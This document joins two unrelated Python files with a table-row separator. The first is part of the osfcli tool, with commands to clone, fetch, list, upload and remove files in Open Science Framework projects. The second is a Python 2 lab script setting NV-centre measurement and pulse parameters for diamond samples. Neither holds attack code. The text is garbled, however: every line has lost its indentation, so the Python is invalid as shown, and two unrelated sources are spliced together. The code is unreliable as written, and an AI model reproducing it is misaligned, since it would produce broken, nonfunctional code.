"""Initialize or edit an existing .osfcli.config file."""
# reading existing config file, convert to configparser object
config = config_from_file()
config_ = configparser.ConfigParser()
config_.add_section('osf')
if 'username' not in config.keys():
config_.set('osf', 'username', '')
else:
config_.set('osf', 'username', config['username'])
if 'project' not in config.keys():
config_.set('osf', 'project', '')
else:
config_.set('osf', 'project', config['project'])
# now we can start asking for new values
print('Provide a username for the config file [current username: {}]:'.format(
config_.get('osf', 'username')))
username = input()
if username:
config_.set('osf', 'username', username)
print('Provide a project for the config file [current project: {}]:'.format(
config_.get('osf', 'project')))
project = input()
if project:
config_.set('osf', 'project', project)
cfgfile = open(".osfcli.config", "w")
config_.write(cfgfile)
cfgfile.close()
@might_need_auth
def clone(args):
"""Copy all files from all storages of a project.
The output directory defaults to the current directory.
If the project is private you need to specify a username.
If args.update is True, overwrite any existing local files only if local and
remote files differ.
"""
osf = _setup_osf(args)
project = osf.project(args.project)
output_dir = args.project
if args.output is not None:
output_dir = args.output
with tqdm(unit='files') as pbar:
for store in project.storages:
prefix = os.path.join(output_dir, store.name)
for file_ in store.files:
path = file_.path
if path.startswith('/'):
path = path[1:]
path = os.path.join(prefix, path)
if os.path.exists(path) and args.update:
if checksum(path) == file_.hashes.get('md5'):
continue
directory, _ = os.path.split(path)
makedirs(directory, exist_ok=True)
with open(path, "wb") as f:
file_.write_to(f)
pbar.update()
@might_need_auth
def fetch(args):
"""Fetch an individual file from a project.
The first part of the remote path is interpreted as the name of the
storage provider. If there is no match the default (osfstorage) is
used.
The local path defaults to the name of the remote file.
If the project is private you need to specify a username.
If args.force is True, write local file even if that file already exists.
If args.force is False but args.update is True, overwrite an existing local
file only if local and remote files differ.
"""
storage, remote_path = split_storage(args.remote)
local_path = args.local
if local_path is None:
_, local_path = os.path.split(remote_path)
local_path_exists = os.path.exists(local_path)
if local_path_exists and not args.force and not args.update:
sys.exit("Local file %s already exists, not overwriting." % local_path)
directory, _ = os.path.split(local_path)
if directory:
makedirs(directory, exist_ok=True)
osf = _setup_osf(args)
project = osf.project(args.project)
store = project.storage(storage)
for file_ in store.files:
if norm_remote_path(file_.path) == remote_path:
if local_path_exists and not args.force and args.update:
if file_.hashes.get('md5') == checksum(local_path):
print("Local file %s already matches remote." % local_path)
break
with open(local_path, 'wb') as fp:
file_.write_to(fp)
# only fetching one file so we are done
break
@might_need_auth
def list_(args):
"""List all files from all storages for project.
If the project is private you need to specify a username.
"""
osf = _setup_osf(args)
project = osf.project(args.project)
for store in project.storages:
prefix = store.name
for file_ in store.files:
path = file_.path
if path.startswith('/'):
path = path[1:]
print(os.path.join(prefix, path))
@might_need_auth
def upload(args):
"""Upload a new file to an existing project.
The first part of the remote path is interpreted as the name of the
storage provider. If there is no match the default (osfstorage) is
used.
If the project is private you need to specify a username.
To upload a whole directory (and all its sub-directories) use the `-r`
command-line option. If your source directory name ends in a / then
files will be created directly in the remote directory. If it does not
end in a slash an extra sub-directory with the name of the local directory
will be created.
To place contents of local directory `foo` in remote directory `bar/foo`:
$ osf upload -r foo bar
To place contents of local directory `foo` in remote directory `bar`:
$ osf upload -r foo/ bar
"""
osf = _setup_osf(args)
if osf.username is None or osf.password is None:
sys.exit('To upload a file you need to provide a username and'
' password.')
project = osf.project(args.project)
storage, remote_path = split_storage(args.destination)
if remote_path == '':
remote_path = os.path.split(args.source)[-1]
store = project.storage(storage)
if args.recursive:
if not os.path.isdir(args.source):
raise RuntimeError("Expected source ({}) to be a directory when "
"using recursive mode.".format(args.source))
# local name of the directory that is being uploaded
_, dir_name = os.path.split(args.source)
for root, _, files in os.walk(args.source):
subdir_path = os.path.relpath(root, args.source)
for fname in files:
local_path = os.path.join(root, fname)
with open(local_path, 'rb') as fp:
# build the remote path + fname
name = os.path.join(remote_path, dir_name, subdir_path,
fname)
store.create_file(name, fp, force=args.force,
update=args.update)
else:
with open(args.source, 'rb') as fp:
store.create_file(remote_path, fp, force=args.force,
update=args.update)
@might_need_auth
def remove(args):
"""Remove a file from the project's storage.
The first part of the remote path is interpreted as the name of the
storage provider. If there is no match the default (osfstorage) is
used.
"""
osf = _setup_osf(args)
if osf.username is None or osf.password is None:
sys.exit('To remove a file you need to provide a username and'
' password.')
project = osf.project(args.project)
storage, remote_path = split_storage(args.target)
store = project.storage(storage)
for f in store.files:
if norm_remote_path(f.path) == remote_path:
f.remove()
|
8,092 | 3f20438b0dd2ae8de470e5456dbb764eabf69645 | import types
import qt
cfg = qt.cfgman
cfg.remove_cfg('protocols')
cfg.remove_cfg('samples')
cfg.remove_cfg('setup')
cfg.add_cfg('protocols')
cfg.add_cfg('samples')
cfg.add_cfg('setup')
cfg['samples']['current'] = 'hans-sil13'
cfg['protocols']['current'] = 'hans-sil13-default'
print 'updating msmt params for {}'.format(cfg['samples']['current'])
##############################################################################
##############################################################################
### Protocols
###
### To make sure everything works fine, only leave the current sample
### un-commented here (we use local variables here for convenience,
### that WILL lead to trouble because the get overwritten in each sample
### section)
##############################################################################
##############################################################################
##############################################################################
### The111/2
##############################################################################
# branch='samples/sil2/'
# f_msm1_cntr = 2.826961e9
# N_frq = 7.13429e6
# N_HF_frq = 2.19290e6
# cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
# cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
# cfg.set(branch+'N_HF_frq', N_HF_frq)
# mw0 = 2.8e9
# f0 = f_msm1_cntr - mw0
# Nsplit = N_HF_frq
# finit = f0 - Nsplit
# fmIp1 = f_msm1_cntr - mw0 + N_HF_frq
# cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
# cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
# cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
##############################################################################
### HANS/4
##############################################################################
# branch='samples/hans-sil4/'
# f_msm1_cntr = 2.826455e9
# N_frq = 7.13377e6
# N_HF_frq = 2.19290e6
# cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
# cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
# cfg.set(branch+'N_HF_frq', N_HF_frq)
# mw0 = 2.8e9
# f0 = f_msm1_cntr - mw0
# Nsplit = N_HF_frq
# finit = f0 - Nsplit
# fmIp1 = f_msm1_cntr - mw0 + N_HF_frq
# cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
# cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
# cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
branch='samples/hans-sil4/'
f_msm1_cntr = 2.827962e9
N_frq = 7.13456e6
N_HF_frq = 2.19290e6
cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
cfg.set(branch+'N_HF_frq', N_HF_frq)
mw0 = 2.8e9
f0 = f_msm1_cntr - mw0
Nsplit = N_HF_frq
finit = f0 - Nsplit
fmIp1 = f_msm1_cntr - mw0 + N_HF_frq
cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
##############################################################################
##############################################################################
### Protocols
##############################################################################
##############################################################################
### General settings for AdwinSSRO
branch='protocols/AdwinSSRO/'
cfg.set(branch+ 'AWG_done_DI_channel', 16)
cfg.set(branch+ 'AWG_event_jump_DO_channel', 14)
cfg.set(branch+ 'AWG_start_DO_channel', 10)
cfg.set(branch+ 'A_laser_DAC_channel', 6)
cfg.set(branch+ 'Ex_laser_DAC_channel', 7)
cfg.set(branch+ 'counter_channel', 1)
cfg.set(branch+ 'cycle_duration', 300)
cfg.set(branch+ 'green_laser_DAC_channel', 4)
cfg.set(branch+ 'green_off_amplitude', 0.0)
cfg.set(branch+ 'green_repump_amplitude', 50e-6)
cfg.set(branch+ 'green_repump_duration', 10)
cfg.set(branch+ 'send_AWG_start', 0)
cfg.set(branch+ 'sequence_wait_time', 1)
cfg.set(branch+ 'wait_after_RO_pulse_duration', 3)
cfg.set(branch+ 'wait_after_pulse_duration', 3)
cfg.set(branch+ 'cr_wait_after_pulse_duration', 1)
cfg.set(branch+ 'wait_for_AWG_done', 0)
cfg.set(branch+ 'green_off_voltage', 0)
cfg.set(branch+ 'repump_off_voltage', 0)
cfg.set(branch+ 'yellow_repump_amplitude', 50e-9)
cfg.set(branch+ 'yellow_repump_duration', 500)
cfg.set(branch+ 'yellow_repump_after_repetitions',100)
cfg.set(branch+ 'yellow_CR_repump', 1)
cfg.set(branch+ 'green_repump_after_repetitions',1)
cfg.set(branch+ 'green_CR_repump', 1000)
cfg.set(branch+ 'CR_probe_max_time', 1000000)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 1000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
yellow=True
cfg.set(branch + 'yellow', yellow)
if yellow:
cfg.set(branch + 'repump_duration', cfg.get(branch+ 'yellow_repump_duration'))
cfg.set(branch + 'repump_amplitude', cfg.get(branch+ 'yellow_repump_amplitude'))
cfg.set(branch + 'CR_repump', cfg.get(branch+ 'yellow_CR_repump'))
cfg.set(branch + 'repump_after_repetitions', cfg.get(branch+ 'yellow_repump_after_repetitions'))
else:
cfg.set(branch + 'repump_duration', cfg.get(branch+ 'green_repump_duration'))
cfg.set(branch + 'repump_amplitude', cfg.get(branch+ 'green_repump_amplitude'))
cfg.set(branch + 'CR_repump', cfg.get(branch+ 'green_CR_repump'))
cfg.set(branch + 'repump_after_repetitions', cfg.get(branch+ 'green_repump_after_repetitions'))
### General settings for AdwinSSRO+espin
branch='protocols/AdwinSSRO+espin/'
cfg.set(branch+ 'send_AWG_start', 1)
cfg.set(branch+ 'MW_pulse_mod_risetime', 10e-9)
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
### General settings for AdwinSSRO+MBI
branch='protocols/AdwinSSRO+MBI/'
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 1e-6)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration',
np.array([15e-6]).tolist())
cfg.set(branch+ 'AWG_wait_duration_before_shelving_pulse', 100e-9)
cfg.set(branch+ 'nr_of_ROsequences', 1)
cfg.set(branch+ 'MW_pulse_mod_risetime', 10e-9)
cfg.set(branch+ 'AWG_to_adwin_ttl_trigger_duration', 5e-6)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'N_randomize_duration', 50)
cfg.set(branch+ 'Ex_N_randomize_amplitude', 0e-9)
cfg.set(branch+ 'A_N_randomize_amplitude', 0e-9)
cfg.set(branch+ 'yellow_N_randomize_amplitude', 0e-9)
##############################################################################
##############################################################################
### Specific sample settings for protocols
##############################################################################
##############################################################################
##############################################################################
### HANS/13 --- SSRO
##############################################################################
branch='protocols/hans-sil13-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 10e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 100)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 25)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 25)
###############################################################################
#### HANS/1 --- SSRO
###############################################################################
#
#branch='protocols/hans-sil1-default/AdwinSSRO/'
#cfg.set(branch+ 'A_CR_amplitude', 15e-9)
#cfg.set(branch+ 'A_RO_amplitude', 0.)
#cfg.set(branch+ 'A_SP_amplitude', 15e-9)
#cfg.set(branch+ 'CR_duration', 50)
#cfg.set(branch+ 'CR_preselect', 1000)
#cfg.set(branch+ 'CR_probe', 20)
#cfg.set(branch+ 'CR_repump', 1000)
#cfg.set(branch+ 'Ex_CR_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_RO_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_SP_amplitude', 0.)
#cfg.set(branch+ 'SP_duration', 250)
#cfg.set(branch+ 'SP_filter_duration', 0)
#cfg.set(branch+ 'SSRO_duration', 50)
#cfg.set(branch+ 'SSRO_repetitions', 5000)
#cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
#
#cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 11)
#
###############################################################################
#### HANS/1 --- MBI
###############################################################################
#
#branch='protocols/hans-sil1-default/AdwinSSRO+MBI/'
#cfg.set(branch+ 'mw_frq', mw0)
#cfg.set(branch+ 'mw_power', 20)
#cfg.set(branch+ 'Ex_MBI_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
#cfg.set(branch+ 'MBI_duration', 4) #put back to 4 with gate
#cfg.set(branch+ 'max_MBI_attempts', 1)
#cfg.set(branch+ 'MBI_threshold', 1)
#cfg.set(branch+ 'SP_E_duration', 60)
#cfg.set(branch+ 'repump_after_MBI_duration', 15)
#cfg.set(branch+ 'repump_after_MBI_amplitude', 15e-9)
#cfg.set(branch+ 'repump_after_E_RO_duration', 15)
#cfg.set(branch+ 'repump_after_E_RO_amplitude', 15e-9)
#
## MBI pulse
#cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
#cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
#
###############################################################################
#### HANS/1 --- Pulses
###############################################################################
#
#branch='protocols/hans-sil1-default/pulses/'
#
#cfg.set(branch+ 'selective_pi_duration', 2500e-9)
#cfg.set(branch+ 'selective_pi_amp', 0.0166)
#cfg.set(branch+ 'selective_pi_mod_frq', finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
# finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
# finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
# cfg.get(branch+ 'selective_pi_amp'))
#cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
# cfg.get(branch+ 'selective_pi_duration'))
#
#cfg.set(branch+ 'fast_pi_duration', 80e-9)
#cfg.set(branch+ 'fast_pi_amp', 0.816)
#cfg.set(branch+ 'fast_pi_mod_frq', finit)
#
#cfg.set(branch+ 'fast_pi2_duration', 40e-9)
#cfg.set(branch+ 'fast_pi2_amp', 0.816)
#cfg.set(branch+ 'fast_pi2_mod_frq', finit)
#
#### CNOTs
#cfg.set(branch+ 'pi2pi_mIm1_duration', 396e-9)
#cfg.set(branch+ 'pi2pi_mIm1_amp', 0.109166)
#cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
#
#### CORPSE used in the BSM
#CORPSE_frq = 5e6
#cfg.set(branch+ 'CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
#cfg.set(branch+ 'CORPSE_pi_amp', 0.529)
#
## ### TODO
#cfg.set(branch+ 'CORPSE_pi_phase_shift', 104.0)
#
## ### TODO
#cfg.set(branch+ 'CORPSE_pi_center_shift', 0.e-9)
#
#### CORPSE for the full ms=-1 manifold, driven in the center
#### (resonant with mI = 0)
#CORPSE_frq = 6.5e6
#cfg.set(branch+ 'msm1_CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_mod_frq', f_msm1_cntr - mw0)
#cfg.set(branch+ 'msm1_CORPSE_pi_amp', 0.797641)
#
## cfg.set(branch+ 'msm1_CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
## cfg.set(branch+ 'msm1_CORPSE_pi2_amp', 0.818) ###not calibrated
#
#cfg.set(branch+ 'first_C_revival', 50.90e-6)
#
#### Nitrogen pulses
#cfg.set(branch+ 'N_pi_duration', 47.3e-6)
#cfg.set(branch+ 'N_pi_amp', 1)
#
#cfg.set(branch+ 'N_pi2_duration', 47.3e-6/2.)
#cfg.set(branch+ 'N_pi2_amp', 1)
#
#
"""
branch='protocols/sil2-default/pulses/'
tof = 0#11e-9
cfg.set(branch+ 't_offset', tof)
cfg.set(branch+ '4MHz_pi_duration', tof + 125e-9)
cfg.set(branch+ '4MHz_pi_amp', 0.599)
cfg.set(branch+ '4MHz_pi_mod_frq', finit)
cfg.set(branch+ '4MHz_pi2_duration', tof + 62e-9)
cfg.set(branch+ '4MHz_pi2_amp', 0.599)
cfg.set(branch+ '4MHz_pi2_mod_frq', finit)
cfg.set(branch+ 'selective_pi_duration', 2600e-9)
cfg.set(branch+ 'selective_pi_amp', 0.02)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
CORPSE_frq = 3.991e6
cfg.set(branch+ 'CORPSE_pi_60_duration', tof/2. + 1./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_420_duration', tof/2. + 7./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
cfg.set(branch+ 'CORPSE_pi_amp', 0.703)
cfg.set(branch+ 'CORPSE_pi_phase_shift', 74.0)
cfg.set(branch+ 'CORPSE_pi_center_shift', 13e-9)
cfg.set(branch+ 'pi2pi_mIm1_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mIm1_amp', 0.164)
cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
cfg.set(branch+ 'pi2pi_mI0_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mI0_amp', 0.170)
cfg.set(branch+ 'pi2pi_mI0_mod_frq', f0)
cfg.set(branch+ 'pi2pi_mIp1_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mIp1_amp', 0.185)
cfg.set(branch+ 'pi2pi_mIp1_mod_frq', fmIp1)
### set some other pulses that determinine their values from the ones above
cfg.set(branch+ 'AWG_N_CNOT_pulse_duration',
cfg.get(branch+ 'pi2pi_mIm1_duration'))
cfg.set(branch+ 'AWG_N_CNOT_pulse_amp',
cfg.get(branch+ 'pi2pi_mIm1_amp'))
cfg.set(branch+ 'AWG_N_CNOT_pulse_mod_frq',
cfg.get(branch+ 'pi2pi_mIm1_mod_frq'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
cfg.set(branch+ 'AWG_shelving_pulse_duration',
cfg.get(branch+ '4MHz_pi_duration'))
cfg.set(branch+ 'AWG_shelving_pulse_amp',
cfg.get(branch+ '4MHz_pi_amp'))
### Nitrogen pulses
cfg.set(branch+ 'N_pi_duration', 91.1e-6)
cfg.set(branch+ 'N_pi_amp', 1)
cfg.set(branch+ 'N_pi2_duration', 91.1e-6/2.)
cfg.set(branch+ 'N_pi2_amp', 1)
##############################################################################
### The111/2 - SSRO
##############################################################################
branch='protocols/sil2-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 100)
cfg.set(branch+ 'CR_preselect', 40)
cfg.set(branch+ 'CR_probe', 40)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 1000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
### integrated SSRO
cfg.set('protocols/sil2-default/AdwinSSRO-integrated/SSRO_duration', 15)
##############################################################################
### The111/2 - MBI
##############################################################################
branch='protocols/sil2-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 100)
cfg.set(branch+ 'repump_after_MBI_duration', 100)
cfg.set(branch+ 'repump_after_MBI_amplitude', 25e-9)
cfg.set(branch+ 'repump_after_E_RO_duration', 100)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 25e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
### sil2, BSM
cfg.set('protocols/sil2-default/BSM/N_ref_frq', N_frq)
cfg.set('protocols/sil2-default/BSM/e_ref_frq', finit)
##############################################################################
### HANS/1 --- Pulses
##############################################################################
branch='protocols/hans-sil1-default/pulses/'
cfg.set(branch+ 'selective_pi_duration', 2500e-9)
cfg.set(branch+ 'selective_pi_amp', 0.015)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
##############################################################################
### HANS/1 --- SSRO
##############################################################################
branch='protocols/hans-sil1-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 15e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 15e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 15)
##############################################################################
### HANS/1 --- MBI
##############################################################################
branch='protocols/hans-sil1-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 15e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 60)
cfg.set(branch+ 'repump_after_MBI_duration', 15)
cfg.set(branch+ 'repump_after_MBI_amplitude', 15e-9)
cfg.set(branch+ 'repump_after_E_RO_duration', 15)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 15e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
##############################################################################
### HANS/7
##############################################################################
branch='protocols/hans-sil7-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 100)
cfg.set(branch+ 'CR_preselect', 15)
cfg.set(branch+ 'CR_probe', 5)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil7-default/AdwinSSRO-integrated/SSRO_duration', 50)
"""
##############################################################################
### HANS/4 --- SSRO
##############################################################################
branch='protocols/hans-sil4-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 5e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 60e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 10e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 9)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 10)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil4-default/AdwinSSRO-integrated/SSRO_duration', 10)
cfg.set('protocols/hans-sil4-default/AdwinSSRO+espin/mw_frq', mw0)
cfg.set('protocols/hans-sil4-default/AdwinSSRO+espin/mw_power', 20)
##############################################################################
### HANS/4 --- MBI
##############################################################################
branch='protocols/hans-sil4-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 100)
cfg.set(branch+ 'repump_after_MBI_duration', 15)
cfg.set(branch+ 'repump_after_MBI_A_amplitude', [5e-9])
cfg.set(branch+ 'repump_after_MBI_E_amplitude', [0e-9])
cfg.set(branch+ 'repump_after_E_RO_duration', 15)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 5e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
### BSM
cfg.set('protocols/hans-sil4-default/BSM/N_ref_frq', N_frq)
cfg.set('protocols/hans-sil4-default/BSM/e_ref_frq', finit)
cfg.set('protocols/hans-sil4-default/BSM/pi2_evolution_time', 51.086e-6)
cfg.set('protocols/hans-sil4-default/BSM/H_evolution_time', 50.746e-6)
cfg.set('protocols/hans-sil4-default/BSM/H_phase', 46)
##############################################################################
### HANS/4 --- Pulses
##############################################################################
branch='protocols/hans-sil4-default/pulses/'
cfg.set(branch+ 'selective_pi_duration', 2500e-9)
cfg.set(branch+ 'selective_pi_amp', 0.011)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
cfg.set(branch+ 'fast_pi_duration', 62e-9)
cfg.set(branch+ 'fast_pi_amp', 0.844)
cfg.set(branch+ 'fast_pi_mod_frq', finit)
cfg.set(branch+ 'fast_pi2_duration', 33e-9)
cfg.set(branch+ 'fast_pi2_amp', 0.812)
cfg.set(branch+ 'fast_pi2_mod_frq', finit)
### CNOTs
cfg.set(branch+ 'pi2pi_mIm1_duration', 396e-9)
cfg.set(branch+ 'pi2pi_mIm1_amp', 0.083)
cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
### CORPSE used in the BSM
CORPSE_frq = 7.5e6
cfg.set(branch+ 'CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
